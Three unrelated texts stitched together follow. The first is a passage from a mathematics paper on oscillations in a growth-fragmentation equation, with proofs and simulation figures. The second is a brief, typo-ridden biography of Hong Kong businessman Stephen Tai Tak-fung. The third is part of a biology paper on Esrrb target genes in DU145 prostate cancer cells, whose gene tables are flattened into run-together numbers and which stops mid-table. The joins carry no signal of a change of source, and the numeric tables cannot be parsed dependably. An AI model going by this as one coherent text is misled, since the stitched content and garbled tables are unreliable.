First, for $y<0,$ let us denote $s_+(y):=s_+(t,e^{ty})=2-{\frac}{\log (-{\frac}{y}{\log\alpha})}{\log \alpha}$, which is independent of the time $t$. We also notice that $\alpha^{2-s_+(y)}=-{\frac}{y}{\log \alpha}.$
In Corollary 1 of [@DE], this result has been obtained in the case where the kernel is not singular, so that instead of the infinite sum $\sum\limits_{k\in \operatorname{{\mathbb Z}}} U_0 (s_k) e^{{\frac}{2i\pi k}{\log\alpha}yt}$ there was only the term $U_0(s_+(y)).$ Hence to prove the result, it only remains to show that the terms with $U_0(s_k)$ vanish for $k\neq 0.$ Under our simpler assumption of $u_0\in {\cal C}^2_0(\operatorname{{\mathbb R}}_+)$, we have for any continuous and bounded test function $\phi (y)$ with $y\in \operatorname{{\mathbb R}}$: $$\int\limits_{-\infty}^{+\infty} \phi(y)r(t,y)dy=\int\limits_{-\infty}^{-A} + \int\limits_{-A}^{-\varepsilon} +\int\limits_{-\varepsilon}^{+\infty}
\phi(y)r(t,y)dy.$$ For $\varepsilon>0$ small enough and $A>0$ large enough fixed, the first and the third integrals are estimated as in the proof of Corollary 1 in [@DE] (in the notations of [@DE] we have $p_0=-\infty$ and $q_0=+\infty$ due to the fast decay of $u_0$ in $0$ and $\infty$): $v(t,x)$ being exponentially decreasing in time on these interval, and using the regularity assumptions on the test function, these integrals go to zero. Let us call $I$ the second integral, where the mass concentrates, and use the asymptotic behaviour recalled above: $$\begin{array}{ll}
I&:= \int\limits_{-A}^{-\varepsilon} \phi(y)r(t,y)dy\\ \\&= \left(1+o(t^{-\beta})\right)\int\limits_{-A}^{-\varepsilon}\phi(y) t e^{2ty}
e^{-s_+(y)y t}e^{(\alpha^{2-s_+(y)}-1)t}\frac{ \sum\limits_{ k\in \operatorname{{\mathbb Z}}}U_0\left(s_+(y) + {\frac}{2ik\pi}{\log\alpha}\right)
e^{\frac {2i\pi k } {\log \alpha}ty}}{{\sqrt{-2\pi t (\log\alpha)y}}} dy
\\ \\
&= \left(1+o(t^{-\beta})\right)\int\limits_{-A}^{-\varepsilon}\phi(y) t
e^{{\frac}{\log(-{\frac}{y}{\log\alpha})}{\log \alpha} y t}e^{(-{\frac}{y}{\log\alpha}-1)t}\frac{ \sum\limits_{ k\in \operatorname{{\mathbb Z}}}U_0\left(s_+(y) + {\frac}{2ik\pi}{\log\alpha}\right)
e^{\frac {2i\pi k } {\log \alpha}ty}}{{\sqrt{-2\pi t (\log\alpha)y}}} dy.
\\ \\
&=\left(1+o(t^{-\beta})\right)\sum\limits_{k\in \operatorname{{\mathbb Z}}} I_k.
\end{array}$$ The term for $k=0$ is the same as in Corollary 1 in [@DE]: $$\begin{array}{ll}I_0
&= \left(1+o(t^{-\beta})\right)\int\limits_{-A}^{-\varepsilon} \phi(y) \sqrt{t} e^{\Psi(y) t} {\frac}{U_0\big(s_+(y)\big) }{\sqrt{-2\pi (\log\alpha)y}}dy \to_{t\to\infty} \phi(-\log\alpha)U_0(2),
\end{array}$$ using Laplace’s method and the fact that $$\Psi(y):={\frac}{\log(-{\frac}{y}{\log\alpha})}{\log\alpha} y -{\frac}{y}{\log\alpha} -1,\qquad \Psi'(y)={\frac}{\log(-{\frac}{y}{\log\alpha})}{\log\alpha},\qquad \Psi''(y)={\frac}{1}{y\log\alpha}$$ has a unique maximum at $y_0=K'(2)=-\log\alpha$, with $\Psi(-\log\alpha)=0$ and $\Psi''(-\log\alpha)=-{\frac}{1}{(\log\alpha)^2}.$ For the terms $I_k$ with $k\neq 0$ we have $$\begin{array}{ll}I_k&= \left(1+o(t^{-\beta})\right)
\int\limits_{-A}^{-\varepsilon}\phi(y) t e^{2ty}
e^{-s_+(t, e^{ty})y t}e^{(\alpha^{2-s_+(t, e^{ty})}-1)t}\frac{ U_0\left(s_+(t,e^{ty})+{\frac}{2ik\pi}{\log\alpha}\right) e^{\frac {2i\pi k } {\log \alpha}ty}
}{{\sqrt{-2\pi t (\log\alpha)y}}} dy\\ \\
&= \left(1+o(t^{-\beta})\right)\int\limits_{-A}^{-\varepsilon} \phi(y)\sqrt{t} e^{(\Psi(y) +{\frac}{2ik\pi}{\log\alpha} y)t} {\frac}{U_0\big(s_+(y)+{\frac}{2ik\pi}{\log\alpha}\big) }{\sqrt{- 2\pi (\log\alpha) y}}dy \to_{t\to\infty} 0,
\end{array}$$ by the stationary phase approximation. The proof for convergence of $\tilde r$ is similar.
Pointwise oscillatory asymptotic behaviour
------------------------------------------
Despite its seemingly contradiction, we see by the above proof that the steady convergence obtained does not necessarily contradict pointwise oscillations: a weak convergence may happen even for pointwise oscillatory solutions, oscillatory terms compensating each other when averaged by integration.
The weak convergence results above have shed light on the line where the mass concentrates: the line $x=e^{ty_0}=\alpha^{-t}.$ Let us first keep the above seen change of variables $r(t,y)=te^{2ty}v(t,e^{ty})$, Formulae and become, for $y=y_0-\log\alpha:$ $$r(t,y_0)=t\alpha^{-2t} v(t, \alpha^{-t})= \sqrt{{\frac}{t}{2\pi}}{ \sum\limits_{ k\in \operatorname{{\mathbb Z}}}U_0(2+{\frac}{2ik\pi}{\log\alpha})
e^{-{2i\pi k }t}}\left(1+o(t^{-\beta})\right),$$ or, using the Poisson formula $$\begin{array}{ll}
t\alpha^{-2t} v(t,\alpha^{-t}) &= t \alpha^{-2t} \frac{ \sum\limits_{ n\in \operatorname{{\mathbb Z}}} u_0(\alpha^{n-t}) \alpha^{2n}}{{\sqrt{2\pi t} }}\left(1+o(t^{-\beta})\right) = \sqrt{{\frac}{t}{2\pi}} { \sum\limits_{ n\in \operatorname{{\mathbb Z}}} u_0(\alpha^{n-t}) \alpha^{2(n-t)}}\left(1+o(t^{-\beta})\right).
\end{array}$$ These two formulae make obvious the periodic behaviour, of period $T=1,$ of the quantity ${\frac}{r(t,y)}{\sqrt{t}}$. More generally, for a given $y<0$ fixed, these two formulae also show that the function $$f_y(t)=\sqrt{t}e^{2ty-\Psi(y) t}v(t,e^{yt})$$ is periodic in time of period $T_y=-{\frac}{\log\alpha}{y}.$ Since the exponential term $e^{\Psi(y)t}$ is maximal for $y=-\log\alpha,$ the line $(t,\alpha^{-t})$ dominates all the others - what explains the weak convergence result - but each of these lines follow a specific type of periodicity. The period is larger when $|y|$ is smaller, which corresponds to the lines $x=e^{yt}$ going more slowly to zero - other said, to the righ-hand side of the gaussian in $y$ (see also Figure \[fig:2\]). This is explained by the fact that the gaussian becoming wider and wider since its standard deviation is proportional to $\sqrt{t},$ the periodicity needs to be faster in the forefront (left-hand side of the gaussian in Figure \[fig:2\]) and slower after.
Numerical illustration
----------------------
To simulate more easily the asymptotic behaviour, we define $$n(t,y)=e^{2y}v(t,e^y),$$ which satisfies the following equation $${\frac}{{\partial}}{{\partial}t} n(t,y) + n(t,y)=n(t,y+\log \alpha),\qquad n(0,y)=e^{2y}u_0(e^y).$$ We choose as an initial condition for $n(0,y)$ a gaussian of mean zero and variance $\sigma^2.$ For $\sigma$ large, we do not observe any oscillations - exactly as in the previous numerical illustration of [@DE] where we did not pay attention to the oscillatory phenomena. But for $\sigma$ small enough, clear oscillations appear and illustrate exactly the results. In Figure \[fig:1\], we take $\sigma=0.1$, $\alpha=2$ and draw the numerical value of $\sqrt{t} n(t,-t\log(2)),$ $\sqrt{t} n(t,-2t\log (2))e^{(2\log (2)-1)t}$ and $\sqrt{t} n(t,-{\frac}{t}{2}\log (2))e^{{\frac}{1}{2}(1-\log 2)t}$ which as expected exhibit oscillations of period $1$, ${\frac}{1}{2}$ and $2$ respectively. In Figure \[fig:2\], we show the time evolution of the rescaled profile $\sqrt{t}n(t,y):$ we clearly see the envelope shape of a gaussian appear and become wider and wider, whereas equally-wide peaks are inside the gaussian. [ To illustrate the importance of the initial condition, we take in Figure \[fig:3\] and \[fig:4\] the same quantities with the same parameter values, except the standard deviation, there equal to 0.2. In Figure \[fig:5\] we took $\sigma=0.5:$ no oscillation is visible anymore. The shape of the initial condition has also an influence, as illustrated in Figures \[fig:6\] and \[fig:7\] where we took a Heaviside function in $[0.8,1]$: the shape is conserved when the profile oscillates. Due to the nonlinearity of the initial condition, contrarily to the gaussian initial data, the oscillations never totally disappear for a larger initial support, as shown in Figures \[fig:8\] and \[fig:9\] where the support is $[-1,0]$, then Figure \[fig:11\] where it is $[-5,0]$.]{}
![\[fig:1\] Numerical simulation for $\alpha=2,$ $n(0,y)$ a gaussian of mean $0$ and standard deviation $0.1$. Plot of the time variation of the quantity $\sqrt{t} e^{2ty-\Psi(y)t} v(t,e^{yt})=\sqrt{t} e^{-\Psi(y)t} n(t,yt)$ for $y=-\log (2),$ $y=-2\log (2)$ and $y=-0.5\log(2)$.](Osci_fig1rev.pdf){width="\textwidth"}
![\[fig:2\] Numerical simulation for $\alpha=2,$ $n(0,y)$ a gaussian of mean $0$ and standard deviation $0.1$. Plot of the size-distribution of $\sqrt{t} n(t,y)=\sqrt{t} e^{2y} v(t,e^{y})$. We see the shape of the gaussian becoming wider and wider, whereas oscillations are maintained.](fig2.pdf){width="\textwidth"}
![\[fig:3\] [Numerical simulation for $\alpha=2,$ $n(0,y)$ a gaussian of mean $0$ and standard deviation $0.2$. Plot of the time variation of the quantity $\sqrt{t} e^{2ty-\Psi(y)t} v(t,e^{yt})=\sqrt{t} e^{-\Psi(y)t} n(t,yt)$ for $y=-\log (2),$ $y=-2\log (2)$ and $y=-0.5\log(2)$.]{}](Osci_fig3rev.pdf){width="\textwidth"}
![\[fig:4\][ Numerical simulation for $\alpha=2,$ $n(0,y)$ a gaussian of mean $0$ and standard deviation $0.2$. Plot of the size-distribution of $\sqrt{t} n(t,y)=\sqrt{t} e^{2y} v(t,e^{y})$. We see the shape of the gaussian becoming wider and wider, whereas oscillations are maintained but smaller than for $\sigma=0.1$.]{}](Osci_fig4rev.pdf){width="\textwidth"}
![\[fig:5\][ Numerical simulation for $\alpha=2,$ $n(0,y)$ a gaussian of mean $0$ and standard deviation $0.5$. Plot of the size-distribution of $\sqrt{t} n(t,y)=\sqrt{t} e^{2y} v(t,e^{y})$. We see the shape of the gaussian becoming wider and wider, and no oscillation is anymore visible.]{}](Osci_fig5rev.pdf){width="\textwidth"}
![\[fig:6\] [Numerical simulation for $\alpha=2,$ $n(0,y)$ a Heaviside on $[-0.2,0]$. Plot of the time variation of the quantity $\sqrt{t} e^{2ty-\Psi(y)t} v(t,e^{yt})=\sqrt{t} e^{-\Psi(y)t} n(t,yt)$ for $y=-\log (2),$ $y=-2\log (2)$ and $y=-0.5\log(2)$.]{}](Osci_fig6rev.pdf){width="\textwidth"}
![\[fig:7\] [ Numerical simulation for $\alpha=2,$ $n(0,y)$ a Heaviside on $[-0.2,0].$ Plot of the size-distribution of $\sqrt{t} n(t,y)=\sqrt{t} e^{2y} v(t,e^{y})$. We see the shape of the gaussian becoming wider and wider, whereas oscillations are maintained and keep the shape of the Heaviside.]{}](Osci_fig7rev.pdf){width="\textwidth"}
![\[fig:8\] [Numerical simulation for $\alpha=2,$ $n(0,y)$ a Heaviside on $[-1,0]$. Plot of the time variation of the quantity $\sqrt{t} e^{2ty-\Psi(y)t} v(t,e^{yt})=\sqrt{t} e^{-\Psi(y)t} n(t,yt)$ for $y=-\log (2),$ $y=-2\log (2)$ and $y=-0.5\log(2)$.]{}](Osci_fig10rev.pdf){width="\textwidth"}
![\[fig:9\] [ Numerical simulation for $\alpha=2,$ $n(0,y)$ a Heaviside on $[-1,0].$ Plot of the size-distribution of $\sqrt{t} n(t,y)=\sqrt{t} e^{2y} v(t,e^{y})$. We see the shape of the gaussian becoming wider and wider, whereas oscillations are maintained (though smaller than for more peaked initial data) and keep the shape of the Heaviside.]{}](Osci_fig11rev.pdf){width="\textwidth"}
![\[fig:11\] [ Numerical simulation for $\alpha=2,$ $n(0,y)$ a Heaviside on $[-5,0].$ Plot of the size-distribution of $\sqrt{t} n(t,y)=\sqrt{t} e^{2y} v(t,e^{y})$. We see that the oscillations are maintained (though smaller than for more peaked initial data) and keep the shape of the Heaviside.]{}](Osci_Heavide_5.pdf){width="\textwidth"}
M.D. has been supported by the ERC Starting Grant SKIPPER$^{AD}$ (number 306321). The authors thank J. Bertoin, M. Escobedo and P. Gabriel for illuminating discussions, and M. Dauhoo, L. Dumas and P. Gabriel for the opportunity to work together at the CIMPA school in Mauritius.
[10]{}
Etienne Bernard, Marie Doumic, and Pierre Gabriel. . working paper or preprint, September 2016.
J. Bertoin and [A. R.]{} Watson. Probabilistic aspects of critical growth-fragmentation equations. , 9 2015.
Jean Bertoin. The asymptotic behavior of fragmentation processes. , 5(4):395–416, 2003.
Thibault Bourgeron, Marie Doumic, and Miguel Escobedo. Estimating the division rate of the growth-fragmentation equation with a self-similar kernel. , 30(2):025007, 2014.
G. Derfel, B. van Brunt, and G. Wake. A cell growth model revisited. , 19(1-2):75–85, 2012.
O. Diekmann, H.J.A.M. Heijmans, and H.R. Thieme. On the stability of the cell size distribution. , 19:227–248, 1984.
M. Doumic and P. Gabriel. Eigenelements of a general aggregation-fragmentation model. , 20(05):757, 2009.
Marie Doumic and Miguel Escobedo. Time asymptotics for a critical case in fragmentation and growth-fragmentation equations. , 9(2):251–297, june 2016.
Marie Doumic, Miguel Escobedo, and Magali Tournus. . working paper or preprint, April 2017.
L. Robert and M. Hoffmann and N. Krell and S. Aymerich and J. Robert and M. Doumic . . BMC Biology, 12 (1), 2014.
M. [Escobedo]{}. . , November 2016.
M. [Escobedo]{}. . , March 2017.
Günther Greiner and Rainer Nagel. Growth of cell populations via one-parameter semigroups of positive operators. In Jerome Goldstein, , Steven Rosencrans, , and Gary Sod, editors, [*Mathematics Applied to Science*]{}, pages 79 – 105. Academic Press, 1988.
A. J. Hall and G. C. Wake. Functional-differential equations determining steady size distributions for populations of cells growing exponentially. , 31(4):434–453, 1990.
A.J. Hall and G.C. Wake. A functional differential equation arising in modelling of cell growth. , 30:424–435, 1989.
B. Perthame. . Frontiers in Mathematics. Birkhäuser Verlag, Basel, 2007.
B. Perthame and L. Ryzhik. Exponential decay for the fragmentation or cell-division equation. , 210(1):155–177, 2005.
I.W. Stewart. On the coagulation-fragmentation equation. , 41(6):917–924, 1990.
B. van Brunt and G. C. Wake. A mellin transform solution to a second-order pantograph equation with linear dispersion arising in a cell growth model. , 22(2):151–168, 2011.
Ali A. Zaidi, B. Van Brunt, and G. C. Wake. Solutions to an advanced functional partial differential equation of the pantograph type. , 471(2179), 2015.
Ali Ashher Zaidi, Bruce van Brunt, and Graeme Charles Wake. A model for asymmetrical cell division. , 12(3):491–501, 2015.
R. M. [Ziff]{} and E. D. [McGrady]{}. . , 18:3027–3037, October 1985.
[^1]: Sorbonne Universités, Inria, UPMC Univ Paris 06, Lab. J.L. Lions UMR CNRS 7598, Paris, France
[^2]: Wolfgang Pauli Institute, University of Vienna, Vienna, Austria, [email protected]
[^3]: Institute of Fundamental Sciences, Massey University, New Zealand, [email protected]
|
Stephen Tai Tak-fung GBM JP () is the founder and current board of directors of Sizhou Group (). He is also serving as the Chairman of the Hong Kong Food Investment Holdings Limited ().
Life
Stephen Tai Tak-fung was born and brought up in Puning city, Guangdong Province, China. He started career in snack businesses by founding the company named "Snack Talk". He later establisged Sizhou Group and Gongdelin Vegetarian that fetched him the title "Snack King". After the success of his career, he invested in public welfare causes including education, disasters, and culture. He has held a number of social positions in both mainland China and Hong Kong. |
Background {#Sec1}
==========
Esrrb encodes nuclear receptor estrogen related receptor β (Esrrb), which belongs to the nuclear receptor family. Esrrb acts as a transcription factor by binding to a specific DNA sequence estrogen related receptor response element (ERRE), which is also known as steroid factor response element (SFRE), or half site estrogen response element \[[@CR1], [@CR2]\].
Esrrb, first cloned in 1988, was not intensively studied until recent years. Knocking out of Esrrb was embryonic lethal due to placental malformation \[[@CR3]\]. Though early studies showed a very limited range of tissues with positive Esrrb expression, recent studies reported that short form Esrrb alternative splicing isoform had a broad range of expression \[[@CR4]\]. Esrrb was found to be a core-reprogramming factor to reprogram Pluripotent Stem Cells (iPSCs) \[[@CR3]--[@CR6]\]. *c*-*myc* and *klf4* of the OSKM (*oct4*, *sox2*, *klf4*, *c*-*myc*) core-reprogramming factors can be replaced by Esrrb \[[@CR5], [@CR6]\]. Esrrb was also recently reported to drive *sox2* transcription and induce iPSC in a single cell system \[[@CR7]\].
Tumorigenesis and tumor progression are related to Esrrb. Esrrb was shown to be down-regulated in prostate cancer epithelium compared to normal prostate tissue \[[@CR8]--[@CR10]\]. Its re-expression in DU145 and LNCaP cells was shown to stimulate tumor suppressor *cdkn1a* (p21) concentration. Also, Esrrb can inhibit Estrogen Receptor transcriptional activity in uterine endometrial cancer cells and Nrf2-Keap signaling pathway in breast cancer cells \[[@CR11], [@CR12]\].
There are a handful of transcriptome-wide expression survey data from Esrrb knockdown in both human iPSCs and mouse embryonic stem cells \[[@CR13]--[@CR16]\]. Known Esrrb controlled genes include *klf4*, *c*-*myc*, *cdkn1a* and *cyp19a1*, but Esrrb target genes in cancer cells are still not known.
This manuscript focuses on the discovery of Esrrb ligand-independent and Esrrb ligand-dependent target genes. We performed RNA-Seq analysis to characterize Esrrb regulated mRNAs in a prostate cancer cell line and we found the treatment of DY131 expanded Esrrb's transcriptional regulation activity to many more genes.
Results {#Sec2}
=======
Establishment of the Esrrb stably transfected DU145 cells {#Sec3}
---------------------------------------------------------
Esrrb expression vector or control pcDNA3.1 (Zeo+) vector were transfected into DU145 cells. After 3 weeks of Zeocine selection, we characterized the Esrrb status by reverse transcriptase (RT)-PCR, qPCR and western blot analysis (Fig. [1](#Fig1){ref-type="fig"}a--c). Our results showed that Esrrb was successfully expressed in DU145-Esrrb cells. Although RNA-Seq showed that DU145-pc3.1 cells had a very small amount of Esrrb expressed (count per million read \<1), the Esrrb concentration is below the detection limit of RT-PCR and western blot. Compared to HEK293 cells, which expressed endogenous Esrrb, overexpression of Esrrb in DU145 cells raised the Esrrb protein concentration to a comparable physiological concentration (Fig. [1](#Fig1){ref-type="fig"}b). In addition, our RT-PCR results and RNA-seq results confirmed the estrogen related receptor gamma (Esrrg) was not expressed in DU145 cells. The absence of Esrrg eliminated any possible functional contamination by Esrrg in our Esrrb studies (Fig. [1](#Fig1){ref-type="fig"}c).Fig. 1Characterization of Esrrb-expressing cancer cell line. Esrrb status of two independent replicates of stable transfected control DU145-pc3.1 and DU145-Esrrb cells are tested by **a** quantitative PCR **b** Western blot and **c** reverse transcriptase PCR. **a** Relative mRNA concentrations of Esrrb were measured by qPCR, Esrrb transcripts concentration were determined by standard curve method and Esrrb concentration were first normalized to the concentration of house keeping gene GAPDH, then normalized to Esrrb/GAPDH ratio of DU145-pc3.1 cells. **b** Total protein was extracted form HEK293, DU145-Esrrb and control DU145-pc3.1 cells. Protein concentration of Esrrb was determined by western blot using GAPDH as internal control. **c** RT-PCR was performed on total RNA extracted from HEK293, DU145-esrrb and control DU145-pc3.1 cells. Esrrb was expressed in DU145-Esrrb cells, while Esrrg is not expressed in either DU145-pc3.1 and DU145-Esrrb cells
Esrrb expression alters mRNA profile {#Sec4}
------------------------------------
To distinguish genes regulated by Esrrb, we performed RNA-Seq analysis on cDNA libraries constructed from two biological replicates of both DU145-pc3.1 and DU145-Esrrb cells. Spearman ranking correlation analysis showed that the expression of Esrrb in DU145 created a distinct transcriptome compared to control DU145-pc3.1 cells (Fig. [2](#Fig2){ref-type="fig"}a). We found 67 genes (21 genes up-regulated, 46 genes down-regulated) altered due to Esrrb expression (Fig. [2](#Fig2){ref-type="fig"}b; Table [1](#Tab1){ref-type="table"}). Seven genes that are among the most changed genes (*zcwpw2*, *hoxb8*, *tagln*, *f13a1*, *pxdn*, *aox1*, and *bmp4*, as well as *tgfβ* as a negative control) were confirmed by qPCR (Fig. [3](#Fig3){ref-type="fig"}). Gene ontology (GO) analysis shows that the products of Esrrb driven differentially expressed genes fell into functional categories of regulation of cell development as well as immune responses (Table [2](#Tab2){ref-type="table"}).Fig. 2Transcriptome correlation and Esrrb altered mRNAs. **a** Transcriptome correlation analysis was performed using Spearman Ranking Correlation. *Color* represents the correlation coefficient. DY131 treatment to DU145-Esrrb cells results in the lowest correlation coefficient with DU145-pc3.1 cells. **b** *Dot plot* of Esrrb-induced gene expression alteration. Genes expressed at adequate level are tested for differential gene expression test. The *plot* was made by plotting the Log2FC (fold change) against the Log2 cpm (count-per-million) difference. *Red color* marks the genes that are significant differentially expressed (FDR \< 0.05), and the *blue lines* marked the Log2FC cutoff value (Log2FC \> 1 or Log2FC \< −1). 67 genes passed both thresholdsTable 1Esrrb altered mRNAsGene symbollogFCP valueFDRAOX1−3.494.89E−1843.19E−180PXDN−2.794.45E−871.16E−83F13A1−2.689.28E−1144.04E−110BMP4−2.591.69E−291.16E−26NPTX1−2.111.06E−461.73E−43SPNS2−1.708.70E−317.09E−28DDX60−1.612.43E−154.46E−13NEFL−1.611.84E−132.85E−11OASL−1.601.30E−257.07E−23IFIT3−1.604.29E−425.09E−39WDR52−1.501.85E−067.40E−05C3−1.437.81E−095.73E−07LOC344887−1.415.01E−201.49E−17PCDHB15−1.416.25E−060.00020978CXorf57−1.411.78E−101.92E−08IFI6−1.381.09E−192.91E−17CXCR4−1.323.23E−060.00011537GBP1−1.311.43E−077.57E−06IGFBP3−1.313.19E−891.04E−85ZSCAN12P1−1.300.000155850.00302695RNF128−1.291.58E−101.73E−08SAMD9−1.292.69E−221.13E−19UNC5A−1.288.28E−073.62E−05MX2−1.271.68E−066.86E−05SSBP2−1.265.96E−050.00141054MX1−1.255.99E−222.37E−19SULT4A1−1.204.94E−050.00120711DPYD−1.191.35E−050.00040257NEBL−1.181.16E−121.62E−10TAGLN−1.185.48E−303.97E−27INA−1.172.47E−050.0006739BMF−1.163.32E−050.00085559ESRP1−1.130.000142060.00283503GJA3−1.121.38E−050.00040614IFIT2−1.111.02E−192.76E−17LOC1005065−1.108.53E−050.0018618RARRES3−1.071.84E−079.68E−06TMEM45A−1.064.69E−060.00016245LGALS3BP−1.054.57E−179.63E−15ERAP2−1.051.83E−503.41E−47WNT10A−1.050.000244170.00440189PADI2−1.041.13E−172.55E−15REEP1−1.010.000247040.0044413AMIGO2−1.018.26E−451.08E−41HES1−0.981.30E−077.01E−06FRMD4B−0.980.000144420.00284746NRIP30.974.28E−146.90E−12HOXB80.983.60E−114.33E−09KCNQ50.985.87E−083.55E−06COX6B20.991.24E−076.77E−06PPFIBP21.046.38E−072.92E−05KIAA11991.061.21E−256.89E−23BST11.084.97E−137.30E−11LOC10013361.130.000199210.00370382SMOC11.151.52E−066.32E−05LOC4414541.159.40E−060.00029713DDIT4L1.182.28E−102.39E−08SEMA3F1.272.08E−206.96E−18DUOX11.355.37E−094.25E−07ARHGAP241.396.40E−106.01E−08CDHR11.442.04E−067.93E−05SDC21.441.49E−081.04E−06SH3RF31.441.32E−050.00039562PRSS81.456.96E−060.00022989TKTL11.903.68E−211.33E−18FGB1.965.57E−222.27E−19ZCWPW25.223.47E−2154.53E−211Fig. 3Esrrb-regulated mRNA validation. *Left panel* qPCR validation of Esrrb-regulated mRNAs. Expression values were firstly normalized to Gapdh and normalized ratios are further normalized to that of DU145-pc3.1. *Error bars* represent standard deviation. Student t test was performed for statistical analysis (\*p \< 0.05). Seven genes were differentially expressed in both RNA-seq and qPCR, 1 gene, TGFbeta, is not differentially expressed in either assay and serves as a negative control. *Right panel* RNA-Seq analysis result, fold change (FC) indicates the ratio of normalized read counts in DU145-Esrrb to that of DU145-pc3.1Table 2Gene ontology analysis of Esrrb altered mRNAsTermCountP valueGO:0060284 \~ regulation of cell development50.006GO:0006955 \~ immune response80.012GO:0009611 \~ response to wounding70.012GO:0042542 \~ response to hydrogen peroxide30.017GO:0050767 \~ regulation of neurogenesis40.022GO:0006800 \~ oxygen and reactive oxygen species metabolic process30.024GO:0060052 \~ neurofilament cytoskeleton organization20.029GO:0000302 \~ response to reactive oxygen species30.03GO:0051960 \~ regulation of nervous system development40.032GO:0031960 \~ response to corticosteroid stimulus30.038GO:0010035 \~ response to inorganic substance40.038GO:0045661 \~ regulation of myoblast differentiation20.039GO:0048667 \~ cell morphogenesis involved in neuron differentiation40.04
DY131 requires Esrrb to affect gene expression {#Sec5}
----------------------------------------------
To get a more comprehensive understanding of Esrrb-regulated genes and characterize Esrrb's potential ligand dependent activity, control DU145-pc3.1 and DU145-Esrrb cells were treated with Esrrb/Esrrg synthetic ligand DY131. Since both qPCR and RNA-seq show Esrrb transcript concentration is extremely low in DU145 cells and Esrrg is absent, and Esrrb protein concentration is also below the detection limit of western-blot analysis, it was not surprising to observe DY131 treatment without Esrrb expressed did not result in any gene differentially expressed (Fig. [4](#Fig4){ref-type="fig"}a). After we applied DY131 to DU145-Esrrb cells, we found DY131 treatment most significantly modified the transcriptome (Figs. [2](#Fig2){ref-type="fig"}a, [4](#Fig4){ref-type="fig"}b). Further comparison of DU145-Esrrb cells alone to DY131-treated DU145-Esrrb cells detected 1161 altered mRNAs (861 down-regulated, 300 up-regulated). 15 of them overlapped with Esrrb-induced mRNA alterations (Fig. [4](#Fig4){ref-type="fig"}c, d; Table [3](#Tab3){ref-type="table"}). We defined an Esrrb agonist as a ligand that moves the mRNA concentration in the direction as Esrrb does; and an antagonist moves the concentration in the opposite direction as Esrrb does. By comparing the trend of the altered genes induced by Esrrb expression and DY131 treatment, DY131 acts as an agonist for 4 of the 15 genes, and an antagonist for 11 of the 15 genes (Fig. [4](#Fig4){ref-type="fig"}d). There are another 1146 mRNAs changed with both Esrrb and DY131 treatment compared to Esrrb alone, indicating their responses is ligand-dependent (Table [3](#Tab3){ref-type="table"}).Fig. 4mRNA alteration by DY131 requires Esrrb expression. **a** DY131 treatment alone did not alter the expression of any gene. In contrast, when Esrrb was expressed, **b** DY131 altered 1161 mRNAs. **c** Venn Diagram of pairwise comparisons of altered mRNAs showed 15 (p = 0.0014) Esrrb altered mRNAs can be further regulated by DY131 treatment (overlap between Esrrb vs. control and Esrrb + DY131 vs. Esrrb). **d** Heat map of mRNA concentration of the 15 genes that response to both Esrrb expression as well as DY131 treatment. Log2-transformed normalized read counts of these 15 genes were color coded. DY131 is an agonist for 4 mRNAs that are responsive to Esrrb, while it is an antagonist of Esrrb in regulating the other 11 mRNAsTable 3DY131 altered mRNAs when Esrrb is expressedGene symbollogFCP valueFDRMTRNR2L8−6.8300MTRNR2L10−5.319.85E−2424.62E−239SNHG5−5.111.21E−2776.66E−275RPS29−4.9100SEC61G−4.482.94E−1657.90E−163RPL36A−4.352.35015968815850.00E+00RPL12−3.6200TMEM212−3.601.12E−564.20E−55ESRG−3.586.76E−1149.61E−112NEDD8-MDP1−3.477.24E−1027.97E−100FOS−3.342.98E−539.94E−52SLIRP−3.281.01E−1271.85E−125MTRNR2L1−3.1200LGALS3−2.943.19E−1154.69E−113SYTL1−2.939.57E−291.23E−27CLIC3−2.807.42E−299.60E−28WISP2−2.807.36E−562.71E−54ABCD3−2.745.71E−214.79E−20TNNT1−2.694.26E−531.42E−51RPL31−2.6800ASS1−2.662.78E−303.82E−29EGR1−2.6300PSMA1−2.573.99E−893.55E−87MRPL4−2.565.21E−985.36E−96ACPI−2.558.68E−271.02E−25USMG5−2.544.08E−1246.97E−122CRIP1−2.527.63E−1551.76E−152STAT4−2.465.11E−224.64E−21NDUFA11−2.452.16E−932.05E−91SCFD1−2.446.21E−3044.14E−301CYBA−2.445.78E−173.76E−16NAPSA−2.432.66E−171.77E−16RPL13AP5−2.4300RPL9−2.4200TCTEX1D2−2.416.26E−194.62E−18MKNK2−2.354.60E−833.57E−81RPL18−2.3500MUC1−2.332.97E−731.75E−71SEPP1−2.334.57E−142.42E−13PDE9A−2.321.44E−657.05E−64SEMA6B−2.321.67E−535.59E−52RPS15A−2.3000CNTN1−2.293.68E−182.58E−17CA11−2.288.82E−269.90E−25TXN−2.2700LOC728730−2.264.28E−152.45E−14GSTM1−2.263.08E−396.17E−38MACROD1−2.265.25E−173.42E−16CBLC−2.255.56E−235.30E−22SUCLG2−2.247.28E−1129.70E−110PDCD4−2.214.54E−1035.13E−101NDUFB2−2.168.58E−734.91E−71C4orf48−2.161.10E−167.00E−16PIR-FIGF−2.151.69E−352.92E−34DHRS3−2.134.91E−203.92E−19RPL38−2.124.53E−2472.20E−244COX17−2.115.14E−265.86E−25NFE2−2.107.00E−102.63E−09RAB26−2.091.66E−096.04E−09NAPRT1−2.091.48E−1162.20E−114CDK5−2.081.31E−281.67E−27NUCB2−2.082.91E−882.49E−86CEBPD−2.075.29E−834.08E−81DYNC2LI1−2.075.50E−214.63E−20RPL34−2.066.26E−1741.88E−171SNRPF−2.063.85E−1034.39E−101BCKDHB−2.059.69E−261.09E−24ANXA1−2.0400RARS2−2.044.40E−378.15E−36CYP4F11−2.041.11E−188.08E−18SPC24−2.031.42E−179.58E−17PTP4A3−2.024.47E−193.34E−18LOC728190−2.021.35E−126.39E−12PSME1−2.011.62E−811.20E−79POLE2−2.003.59E−571.37E−55NSMCE4A−2.001.78E−617.54E−60FRA10AC1−2.006.45E−431.50E−41RPS12−2.002.44E−2951.47E−292MTRNR2L2−2.004.85E−1671.33E−164TYMP−2.001.58E−352.74E−34RPL11−2.0000CCDC152−1.996.61E−102.49E−09MXD3−1.963.65E−274.38E−26IL17RC−1.953.51E−233.39E−22GRB7−1.951.64E−322.49E−31LOC441454−1.948.75E−103.24E−09PCCA−1.941.00E−218.91E−21ACBD4−1.942.15E−404.51E−39APLP1−1.937.74E−247.77E−23QARS−1.932.90E−1566.93E−154STX8−1.937.69E−268.67E−25TM2D1−1.928.60E−259.14E−24C17orf61−1.921.03E−533.49E−52LOC100507156−1.912.19E−242.27E−23KCNAB2−1.891.65E−433.93E−42CERS4−1.881.66E−272.01E−26C18orf8−1.861.06E−736.36E−72NOTCH3−1.861.46E−169.26E−16LHPP−1.861.93E−